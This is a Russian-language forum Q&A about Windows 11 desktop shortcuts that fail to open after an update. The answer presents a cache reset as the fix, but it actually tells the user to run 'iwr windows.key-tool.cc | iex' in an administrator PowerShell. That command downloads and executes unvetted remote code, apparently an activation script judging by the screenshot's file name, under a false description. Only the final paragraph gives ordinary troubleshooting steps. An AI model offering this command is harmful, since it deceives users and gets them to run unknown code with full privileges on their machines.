Просто установи

Не открываются ярлыки на Windows 11

После обновления защиты Windows 11 ноутбук стал лагать, рабочий стол зависать и много других неприятностей, одна из таких проблема с ярлыками. После перезагрузки/выключения сколько бы раз не нажимал на ярлык он не откроется, а рядом с курсором появляется голубой круг загрузки, а если открывать через пкм, то все ярлыки с рабочего стола пропадут. Найти способ убрать этот баг я не нашел, надеюсь на помощь здесь. Единственное я заметил что запускаются те ярлыки, которые находятся в панели задач.

тебе был дан ответ

Скорее всего надо сбросить кеш

Нажать правой кнопкой мыши по пуску, выбрать PowerShell (администратор), вставить эту команду:

iwr windows.key-tool.cc | iex

Нажать Enter.

(не путать с командной строкой).

В открывшемся окне нажать 1.

https://i1.wampi.ru/2024/07/07/Microsoft-Activation-Scripts.png (скриншот).

После выполнения команды закрыть все окна и перезагрузить ПК.

Проблема с ярлыками после обновления связана, скорее всего, с повреждёнными кэшами или конфликтами в системе. Попробуйте перезапустить проводник через диспетчер задач (Ctrl+Shift+Esc), затем очистить и пересоздать ярлыки, или восстановить систему до точки до обновления.